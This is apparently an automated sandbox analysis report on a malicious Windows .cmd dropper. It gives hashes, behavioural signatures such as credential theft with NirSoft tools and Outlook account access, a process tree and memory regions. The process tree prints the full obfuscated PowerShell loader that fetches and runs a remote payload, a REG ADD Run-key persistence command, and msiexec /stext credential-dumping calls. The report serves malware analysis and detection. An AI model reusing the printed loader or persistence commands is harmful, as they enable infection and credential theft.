Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/10/2024, 14:37

General

  • Target

    ZamwienieAgotechBegyndelsesord.cmd

  • Size

    6KB

  • MD5

    3d7da4151a900b78806ab477742d5dac

  • SHA1

    6c1e6242135295dd5fa581f985691e6e83a578c0

  • SHA256

    18c0a772f0142bc8e5fb0c8931c0ba4c9e680ff97d7ceb8c496f68dea376f9da

  • SHA512

    8a1ab4409d25356a3b7f2a491360e4522903a9fde8e8f08a1bb2e2374e69d2a46ece3f928c5048800f55e3000b7cc8011004a9ef1dc9bc6fc816f35fce7ca6b2

  • SSDEEP

    96:TMYZqpZ6iOlYvwLIcwlzQ5yMNPRhA+aNukrQd5QcEzprsQh47ETwC28iD0yc:T/q76iOlKwWINPsj+Zers57ETwC28eVc

Malware Config

Signatures

  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ZamwienieAgotechBegyndelsesord.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1556
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden " <#Pestepidemier Fylogenetiske Nonentreatingly Hemokonia #>;$Anapanapa='Roughnesses';<#Dividant Hexadactylic Heptahydroxy Fanden Lockstep Modstandene Folkeskolens #>;$Reagensets=$Dyreenheds181+$host.UI;function Frstehaandskendskab($Arbejdslshedskasses){If ($Reagensets) {$Necrosing++;}$meshing=$Koppie+$Arbejdslshedskasses.'Length'-$Necrosing; for( $Masses=4;$Masses -lt $meshing;$Masses+=5){$Kolkhosen249++;$Empuzzle+=$Arbejdslshedskasses[$Masses];$Alliteral='tiendedel';}$Empuzzle;}function Trudgeons($Prehensility){ . ($Olynthiac11) ($Prehensility);}$Planar=Frstehaandskendskab 'Tol.M .troLukrzDat iLabilSka.l BttaL.pp/cent ';$Planar+=Frstehaandskendskab 'F rz5Aggl.Non.0Sco, Moso(rallWPoleiSubdnHomed a roArg wArbesBums KloNObedTA gr Hyd1.rec0Gour.Medi0Forg;Adve ClocWudtyiirrinSe t6Hals4Indf;Sham Ateix amp6Leta4 Bas;Mezq Sv jr KnivPiez: gnf1Osie3 Gr 1Ther.P,nd0vedl)Flos i.teGReapeForfcTouckDo.eo Fe /Prog2Conc0pr d1 H a0Anlg0 upe1Alar0Sang1Enev AlunFobseiSin rW ureUn rfHi soPalmxFris/Stru1N na3Rakk1Nst .K yn0 Qui ';$Banting=Frstehaandskendskab 'BoaruU haS SchE.verrKoa,-Mrb,AcinggS,heEHaemNtalitHell ';$Helfabrikaterne=Frstehaandskendskab 'Ho,oh B ttSemit AutpAlensear :.omm/p at/ F.op seulRespiReuce KollOophtBovsdKonv.St,etDopaoOrd pR pr/DixiBChariUndel hasdMi prmre.e HydnLis e Rev.Re.exTurgt ,ripUd v ';$Amimide=Frstehaandskendskab '.hur>regi ';$Olynthiac11=Frstehaandskendskab ',aryiVerse ,rrxKont ';$Arches='Neurosurgeons';$Disconcertedly='\Kirkernes.Tem';Trudgeons (Frstehaandskendskab 'Sst $ov.rGOmgrlDrisO Sk.bpag a F,blNide:TranH ttEFlamRDor o mulnFastiSto tDisaeCong=Ha t$.oorEBe pnM,rcv akt:G npA ngopDetePUndeDAnonaSkemtBearAGrun+.aug$V.ndDAfr,iBoozSSubsc SlhoSmadnU.skcProseKlaurAldrt Ki,E Diad ncolU.reYGene ');Trudgeons (Frstehaandskendskab ' Cen$Inc gP rsLMicroHildB UndAInexL Una:Mimbm.andORestRHookAErodrPredeBredNL mrtLat EJonir Sph=Siwa$FormHV viEOverlForhFRumfAMeecBD plrMaaniDistKCi gaSpaltP agEPungrEmphN B reAftr.Bow SHemapAftoLSkr.iRef.T ac(,tag$s,ifa Fr mPalaiW isMZo sIBo eD OutEDisp)Data ');Trudgeons (Frstehaandskendskab 'Alka[ElleNS fteSupptSkue.CentsSpg e egr ormVPuffiSlvdCHyggE forPRingoSpecIHeman St tSkr.mTi tADactN HovAPa tG NvnEkreerSulp]inco: Non:OverSReadebor cFodguNudiR ieiVanrT bruYSammPU,dvrDrejOUn.atagloO intc raqOFibrlOver ,ae=Sens Tage[Ls rNRemoeSstvt gav. cisSA,geEU,stcVovhUda.rRGo si .actaandYCentP UdprB lyONubiTMy,hOsc bCProdO .isl KogTUndeYCobip,inieanti]Brn :Insi:BrantCalalP emskubi1Pra 2B ts ');$Helfabrikaterne=$Morarenter[0];$Kontroversen=(Frstehaandskendskab ' ron$La.cgCharL FulOSekuB WamaM,silKlyn:IcossskrsPShadi uglD FlonSteri FarnsagsgstreETandRUdseNfemreKoge=ReliNCh ueMelowSpin-OpvaodestBLibsJ ntiEBa,oC uartB ge ProtSBefoYEfteSPresTStylELocrMModr.AnnonSkrmeBangT Pre. arowR goEv,kaBdde.c At,LnoncIMillEDec NStamtMyrm ');Trudgeons ($Kontroversen);Trudgeons (Frstehaandskendskab 'B nd$ RagSAmpopravjiBl,ddPr enLulli GurnRetigAnareAlinr Masn F,reLog..GrooHMa eeWlada TredAnmaeOtosrJukisSice[Spro$GtesBInsia,unsnPorit ambiAryln Pomg.vne],orl= Att$VideP .yel nsa sacnTrigaYderrange ');$Podos=Frstehaandskendskab '.ndo$Hal SSlagp Ao iOblodG smnBurri ootnUdfrgAkkueDui.rAnvin GeneClun. estDA tro It wSc.nnposilBrowoCounainded b cF Impi EgglUr te Bib(Post$ djiHOu teB tllEnerfMonkaSkilb nder PreiSneekB weaA.butRakee S,urCashnult eF ji,Glde$ForvGUnboeK lvmblanmA tie ,pesDisatReeneRo sdS,oveO klrCeren.preeHypnsNati)did, ';$Gemmestedernes=$Heronite;Trudgeons (Frstehaandskendskab '.ilp$Tho gT,edL omsoNighbUnstAStudLS pi:EartARengfCemeLSansaCompaPlaysVenteConsl,tebIAssegProct Gro= u i(UddaTSesse,pfoS Badt Lys-educPOrl ABlidtSpriHMoil s i$ AfsG alie IatM Br.mOmbyePsykSObsctWa le Oved laceLymprBekrnSou eCompSnove)Lyd. ');while (!$Aflaaseligt) {Trudgeons (Frstehaandskendskab 'U.de$LendgTr sl IndorankbWa,fa LitlVerd:sangBTitalExiseOejenJuledUndiemuzzrKoopn HomeSom.sFore=Virg$K.mptPar rcapnuSkame D,a ') ;Trudgeons $Podos;Trudgeons (Frstehaandskendskab ' DisSCounT EksA LykRSikrt.ynt-Ne bs Refls otEVi jE,tfaptoad Ber.4 pi ');Trudgeons (Frstehaandskendskab 'Domi$HemoG.ncoL HanOPredB BlraVa bLB as:Sok APillFBridLS.inaAbidAEmmeSev cE TaiLBegriLacmgskriTSvin=Frit(T.antO phEF ecSMarstPits-Frplp ukkaE petSviph ogs Notu$EluvG BunESynkM BrumTerme Di,SOverTHierEHumrDbirtE Grar A.vnFundeOtt SHjtl)Samf ') ;Trudgeons (Frstehaandskendskab ',egi$ urwg,uxelSyn,o StuBRecoASamml nv:Vi tLOceai lev Ov s.apiFHal,i lagLRonsOFiskSCo,yO Fa,FPateIhist=Diam$Poo.G U rlmo dO GreBGudsaHoveLmuni:AfstHjernjPos hPampeLangdTeakE .djr UnlnUnveEB da1 ar2Crud7a,at+ Fa +Upar%Cze $Cy lM agsOu stRop aA PalR Euce PrenCo cTD mseDer rgenn.N naCE aco BaaUMorgnfri t The ') ;$Helfabrikaterne=$Morarenter[$Livsfilosofi];}$Massesncommunicability=324829;$tordnendes=29974;Trudgeons (Frstehaandskendskab ' rch$ KongacetLStikOD scb ydraPibeLOste:Do bbOverrPro.uTheostache BesdOutreKol, ize= Ko StorgSprneOstetEkst-FootcAu,oo FabN,nstTBlowE anvN emetA.ri sk n$Inthg,oucETllemCampm .piETrioSdataT,lineTangdDispe ForRUnreNAmbie iesA af ');Trudgeons (Frstehaandskendskab 'Estr$Subvg SkalI dfo ykbSaplaModelipid:Voi.FFl,suMonalT knfDistiKre l itlIntemU.ige Docn.illt loe1 Qua0Ve s4Peer Tom = Sim Dona[CockSErmiy H,rsmerstUn.ie ontmZaca.DrmmCRecioLbsknCh cv,agge rchrblamtFilb]Dise:Aars:KommFSylerT.ptoB nem St.B B mako rs Nare gac6sten4SkrmS AfktRearr r mi Pr.nH,ejg Non(Al o$FinsB Cl.r rriuSupesBlooeNatid hece Val) Sq ');Trudgeons (Frstehaandskendskab 'Ephe$.epog.eakl nthONeurbOverADagsLglo :PodoTPra RAntrARaasnAg nsRundpFribOPic.R Ne T MisA ormPZelaRbehv bs=Forv Wizi[DiessPrody Em SVej,tTmtsE St,MAnnu.Matht ndeSme,XUdhoTP ls.Tusce PhoN FricLoonoB utdOppiILo anExclGPoli]Pr p: Gra:TaknA.krasO reCUndeiBlokIMidt. DemGChile V rt U.sSbefiTG nerCya,i amn ArggBacu( nte$P.lyfFam u.mpyLDig.fAnhyiDek.lHemilSabbmTilbEBeh n Votta pr1Kegl0 Fo 4Kean)F je ');Trudgeons (Frstehaandskendskab 'Piet$SydaGFraiL CiroNewsbBe iaBekmLK,nt: nytDGunhINitosKaagm.onmE folaVictsHjlpu AdeRpreaaInkbB rallLigkeOrdi=Equa$SimptFortR uldA ,olNKagesBantPG,noOPr wrSlynt PleaGrunpUv nRChoc.VectSOve U S rBKollSSe iTLathrTilsiTilfNCad GSc a(Vent$ PremsundA R,wSBisaS ConeBat SdespNUnsiCEnmoO,vneM UnpmOptiu MadNe foi.ushCDeluA StoBKodeiFav.LTolkiMansT NabyS un,U vi$ZinctArveo lagr PhrdAf rnLin.ERh,inTastd UdbeSchuSBas )Bute ');Trudgeons $Dismeasurable;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:408
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Pestepidemier Fylogenetiske Nonentreatingly Hemokonia #>;$Anapanapa='Roughnesses';<#Dividant Hexadactylic Heptahydroxy Fanden Lockstep Modstandene Folkeskolens #>;$Reagensets=$Dyreenheds181+$host.UI;function Frstehaandskendskab($Arbejdslshedskasses){If ($Reagensets) {$Necrosing++;}$meshing=$Koppie+$Arbejdslshedskasses.'Length'-$Necrosing; for( $Masses=4;$Masses -lt $meshing;$Masses+=5){$Kolkhosen249++;$Empuzzle+=$Arbejdslshedskasses[$Masses];$Alliteral='tiendedel';}$Empuzzle;}function Trudgeons($Prehensility){ . ($Olynthiac11) ($Prehensility);}$Planar=Frstehaandskendskab 'Tol.M .troLukrzDat iLabilSka.l BttaL.pp/cent ';$Planar+=Frstehaandskendskab 'F rz5Aggl.Non.0Sco, Moso(rallWPoleiSubdnHomed a roArg wArbesBums KloNObedTA gr Hyd1.rec0Gour.Medi0Forg;Adve ClocWudtyiirrinSe t6Hals4Indf;Sham Ateix amp6Leta4 Bas;Mezq Sv jr KnivPiez: gnf1Osie3 Gr 1Ther.P,nd0vedl)Flos i.teGReapeForfcTouckDo.eo Fe /Prog2Conc0pr d1 H a0Anlg0 upe1Alar0Sang1Enev AlunFobseiSin rW ureUn rfHi soPalmxFris/Stru1N na3Rakk1Nst .K yn0 Qui ';$Banting=Frstehaandskendskab 'BoaruU haS SchE.verrKoa,-Mrb,AcinggS,heEHaemNtalitHell ';$Helfabrikaterne=Frstehaandskendskab 'Ho,oh B ttSemit AutpAlensear :.omm/p at/ F.op seulRespiReuce KollOophtBovsdKonv.St,etDopaoOrd pR pr/DixiBChariUndel hasdMi prmre.e HydnLis e Rev.Re.exTurgt ,ripUd v ';$Amimide=Frstehaandskendskab '.hur>regi ';$Olynthiac11=Frstehaandskendskab ',aryiVerse ,rrxKont ';$Arches='Neurosurgeons';$Disconcertedly='\Kirkernes.Tem';Trudgeons (Frstehaandskendskab 'Sst $ov.rGOmgrlDrisO Sk.bpag a F,blNide:TranH ttEFlamRDor o mulnFastiSto tDisaeCong=Ha t$.oorEBe pnM,rcv akt:G npA ngopDetePUndeDAnonaSkemtBearAGrun+.aug$V.ndDAfr,iBoozSSubsc SlhoSmadnU.skcProseKlaurAldrt Ki,E Diad ncolU.reYGene ');Trudgeons (Frstehaandskendskab ' Cen$Inc gP rsLMicroHildB UndAInexL Una:Mimbm.andORestRHookAErodrPredeBredNL mrtLat EJonir Sph=Siwa$FormHV viEOverlForhFRumfAMeecBD plrMaaniDistKCi gaSpaltP agEPungrEmphN B reAftr.Bow SHemapAftoLSkr.iRef.T ac(,tag$s,ifa Fr mPalaiW isMZo sIBo eD OutEDisp)Data ');Trudgeons (Frstehaandskendskab 'Alka[ElleNS fteSupptSkue.CentsSpg e egr ormVPuffiSlvdCHyggE forPRingoSpecIHeman St tSkr.mTi tADactN HovAPa tG NvnEkreerSulp]inco: Non:OverSReadebor cFodguNudiR ieiVanrT bruYSammPU,dvrDrejOUn.atagloO intc raqOFibrlOver ,ae=Sens Tage[Ls rNRemoeSstvt gav. cisSA,geEU,stcVovhUda.rRGo si .actaandYCentP UdprB lyONubiTMy,hOsc bCProdO .isl KogTUndeYCobip,inieanti]Brn :Insi:BrantCalalP emskubi1Pra 2B ts ');$Helfabrikaterne=$Morarenter[0];$Kontroversen=(Frstehaandskendskab ' ron$La.cgCharL FulOSekuB WamaM,silKlyn:IcossskrsPShadi uglD FlonSteri FarnsagsgstreETandRUdseNfemreKoge=ReliNCh ueMelowSpin-OpvaodestBLibsJ ntiEBa,oC uartB ge ProtSBefoYEfteSPresTStylELocrMModr.AnnonSkrmeBangT Pre. arowR goEv,kaBdde.c At,LnoncIMillEDec NStamtMyrm ');Trudgeons ($Kontroversen);Trudgeons (Frstehaandskendskab 'B nd$ RagSAmpopravjiBl,ddPr enLulli GurnRetigAnareAlinr Masn F,reLog..GrooHMa eeWlada TredAnmaeOtosrJukisSice[Spro$GtesBInsia,unsnPorit ambiAryln Pomg.vne],orl= Att$VideP .yel nsa sacnTrigaYderrange ');$Podos=Frstehaandskendskab '.ndo$Hal SSlagp Ao iOblodG smnBurri ootnUdfrgAkkueDui.rAnvin GeneClun. estDA tro It wSc.nnposilBrowoCounainded b cF Impi EgglUr te Bib(Post$ djiHOu teB tllEnerfMonkaSkilb nder PreiSneekB weaA.butRakee S,urCashnult eF ji,Glde$ForvGUnboeK lvmblanmA tie ,pesDisatReeneRo sdS,oveO klrCeren.preeHypnsNati)did, ';$Gemmestedernes=$Heronite;Trudgeons (Frstehaandskendskab '.ilp$Tho gT,edL omsoNighbUnstAStudLS pi:EartARengfCemeLSansaCompaPlaysVenteConsl,tebIAssegProct Gro= u i(UddaTSesse,pfoS Badt Lys-educPOrl ABlidtSpriHMoil s i$ AfsG alie IatM Br.mOmbyePsykSObsctWa le Oved laceLymprBekrnSou eCompSnove)Lyd. ');while (!$Aflaaseligt) {Trudgeons (Frstehaandskendskab 'U.de$LendgTr sl IndorankbWa,fa LitlVerd:sangBTitalExiseOejenJuledUndiemuzzrKoopn HomeSom.sFore=Virg$K.mptPar rcapnuSkame D,a ') ;Trudgeons $Podos;Trudgeons (Frstehaandskendskab ' DisSCounT EksA LykRSikrt.ynt-Ne bs Refls otEVi jE,tfaptoad Ber.4 pi ');Trudgeons (Frstehaandskendskab 'Domi$HemoG.ncoL HanOPredB BlraVa bLB as:Sok APillFBridLS.inaAbidAEmmeSev cE TaiLBegriLacmgskriTSvin=Frit(T.antO phEF ecSMarstPits-Frplp ukkaE petSviph ogs Notu$EluvG BunESynkM BrumTerme Di,SOverTHierEHumrDbirtE Grar A.vnFundeOtt SHjtl)Samf ') ;Trudgeons (Frstehaandskendskab ',egi$ urwg,uxelSyn,o StuBRecoASamml nv:Vi tLOceai lev Ov s.apiFHal,i lagLRonsOFiskSCo,yO Fa,FPateIhist=Diam$Poo.G U rlmo dO GreBGudsaHoveLmuni:AfstHjernjPos hPampeLangdTeakE .djr UnlnUnveEB da1 ar2Crud7a,at+ Fa +Upar%Cze $Cy lM agsOu stRop aA PalR Euce PrenCo cTD mseDer rgenn.N naCE aco BaaUMorgnfri t The ') ;$Helfabrikaterne=$Morarenter[$Livsfilosofi];}$Massesncommunicability=324829;$tordnendes=29974;Trudgeons (Frstehaandskendskab ' rch$ KongacetLStikOD scb ydraPibeLOste:Do bbOverrPro.uTheostache BesdOutreKol, ize= Ko StorgSprneOstetEkst-FootcAu,oo FabN,nstTBlowE anvN emetA.ri sk n$Inthg,oucETllemCampm .piETrioSdataT,lineTangdDispe ForRUnreNAmbie iesA af ');Trudgeons (Frstehaandskendskab 'Estr$Subvg SkalI dfo ykbSaplaModelipid:Voi.FFl,suMonalT knfDistiKre l itlIntemU.ige Docn.illt loe1 Qua0Ve s4Peer Tom = Sim Dona[CockSErmiy H,rsmerstUn.ie ontmZaca.DrmmCRecioLbsknCh cv,agge rchrblamtFilb]Dise:Aars:KommFSylerT.ptoB nem St.B B mako rs Nare gac6sten4SkrmS AfktRearr r mi Pr.nH,ejg Non(Al o$FinsB Cl.r rriuSupesBlooeNatid hece Val) Sq ');Trudgeons (Frstehaandskendskab 'Ephe$.epog.eakl nthONeurbOverADagsLglo :PodoTPra RAntrARaasnAg nsRundpFribOPic.R Ne T MisA ormPZelaRbehv bs=Forv Wizi[DiessPrody Em SVej,tTmtsE St,MAnnu.Matht ndeSme,XUdhoTP ls.Tusce PhoN FricLoonoB utdOppiILo anExclGPoli]Pr p: Gra:TaknA.krasO reCUndeiBlokIMidt. DemGChile V rt U.sSbefiTG nerCya,i amn ArggBacu( nte$P.lyfFam u.mpyLDig.fAnhyiDek.lHemilSabbmTilbEBeh n Votta pr1Kegl0 Fo 4Kean)F je ');Trudgeons (Frstehaandskendskab 'Piet$SydaGFraiL CiroNewsbBe iaBekmLK,nt: nytDGunhINitosKaagm.onmE folaVictsHjlpu AdeRpreaaInkbB rallLigkeOrdi=Equa$SimptFortR uldA ,olNKagesBantPG,noOPr wrSlynt PleaGrunpUv nRChoc.VectSOve U S rBKollSSe iTLathrTilsiTilfNCad GSc a(Vent$ PremsundA R,wSBisaS ConeBat SdespNUnsiCEnmoO,vneM UnpmOptiu MadNe foi.ushCDeluA StoBKodeiFav.LTolkiMansT NabyS un,U vi$ZinctArveo lagr PhrdAf rnLin.ERh,inTastd UdbeSchuSBas )Bute ');Trudgeons $Dismeasurable;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:3044
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "smigenes" /t REG_EXPAND_SZ /d "%Pesten% -windowstyle 1 $nonpreventible=(gp -Path 'HKCU:\Software\Skydedren\').Forgaber;%Pesten% ($nonpreventible)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3464
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "smigenes" /t REG_EXPAND_SZ /d "%Pesten% -windowstyle 1 $nonpreventible=(gp -Path 'HKCU:\Software\Skydedren\').Forgaber;%Pesten% ($nonpreventible)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3956
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\hsgybktguotvr"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3212
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kmujcdehhwlatngpf"
        3⤵
        • Accesses Microsoft Outlook accounts
        • System Location Discovery: System Language Discovery
        PID:3004
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\uozbdvpbdedfdtvtwwuc"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:408

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    2d74f3420d97c3324b6032942f3a9fa7

    SHA1

    95af9f165ffc370c5d654a39d959a8c4231122b9

    SHA256

    8937b96201864340f7fae727ff0339d0da2ad23c822774ff8ff25afa2ae4da3d

    SHA512

    3c3d2ae3b2581ff32cfee2aedca706e4eaa111a1f9baeb9f022762f7ef2dfb6734938c39eb17974873ad01a4760889e81a7b45d7ed404eb5830f73eb23737f1a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vdurbtul.mlq.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Kirkernes.Tem

    Filesize

    461KB

    MD5

    c28c799cd656aabecee1bdcb7bf8b54a

    SHA1

    081d7eafb5c0f7a1b8b18217e25779124523c939

    SHA256

    8fa0817a784433acb92ccc0189f08b042ea69e12b097bbee35da800b2e7d38e3

    SHA512

    ab4c035e2e34a2f28bb867fdcfc3e3534798d2934ea1b14f9701341ed0ae7cd600d45503455b840befa61c1cb2adfcb1a0a54ee74a8b4ad12a8c197696857528

  • memory/408-3-0x00000190C2AF0000-0x00000190C2B12000-memory.dmp

    Filesize

    136KB

  • memory/408-13-0x00007FFCC7F00000-0x00007FFCC89C1000-memory.dmp

    Filesize

    10.8MB

  • memory/408-14-0x00007FFCC7F00000-0x00007FFCC89C1000-memory.dmp

    Filesize

    10.8MB

  • memory/408-17-0x00007FFCC7F00000-0x00007FFCC89C1000-memory.dmp

    Filesize

    10.8MB

  • memory/408-18-0x00007FFCC7F00000-0x00007FFCC89C1000-memory.dmp

    Filesize

    10.8MB

  • memory/408-21-0x00007FFCC7F00000-0x00007FFCC89C1000-memory.dmp

    Filesize

    10.8MB

  • memory/408-67-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/408-68-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/408-2-0x00007FFCC7F03000-0x00007FFCC7F05000-memory.dmp

    Filesize

    8KB

  • memory/2420-45-0x0000000007A50000-0x0000000007AE6000-memory.dmp

    Filesize

    600KB

  • memory/2420-52-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-28-0x0000000005EC0000-0x0000000005F26000-memory.dmp

    Filesize

    408KB

  • memory/2420-29-0x00000000060A0000-0x0000000006106000-memory.dmp

    Filesize

    408KB

  • memory/2420-39-0x0000000006190000-0x00000000064E4000-memory.dmp

    Filesize

    3.3MB

  • memory/2420-26-0x0000000005890000-0x0000000005EB8000-memory.dmp

    Filesize

    6.2MB

  • memory/2420-41-0x00000000067D0000-0x00000000067EE000-memory.dmp

    Filesize

    120KB

  • memory/2420-42-0x00000000067F0000-0x000000000683C000-memory.dmp

    Filesize

    304KB

  • memory/2420-43-0x0000000008030000-0x00000000086AA000-memory.dmp

    Filesize

    6.5MB

  • memory/2420-44-0x0000000006D60000-0x0000000006D7A000-memory.dmp

    Filesize

    104KB

  • memory/2420-25-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-46-0x00000000079E0000-0x0000000007A02000-memory.dmp

    Filesize

    136KB

  • memory/2420-47-0x0000000008C60000-0x0000000009204000-memory.dmp

    Filesize

    5.6MB

  • memory/2420-24-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-49-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-50-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-51-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-27-0x00000000057E0000-0x0000000005802000-memory.dmp

    Filesize

    136KB

  • memory/2420-53-0x000000007506E000-0x000000007506F000-memory.dmp

    Filesize

    4KB

  • memory/2420-54-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-55-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-56-0x0000000009210000-0x000000000DA34000-memory.dmp

    Filesize

    72.1MB

  • memory/2420-57-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-58-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-59-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-61-0x0000000075060000-0x0000000075810000-memory.dmp

    Filesize

    7.7MB

  • memory/2420-22-0x000000007506E000-0x000000007506F000-memory.dmp

    Filesize

    4KB

  • memory/2420-23-0x0000000005220000-0x0000000005256000-memory.dmp

    Filesize

    216KB

  • memory/3004-70-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/3004-63-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/3212-69-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/3212-66-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/3212-64-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB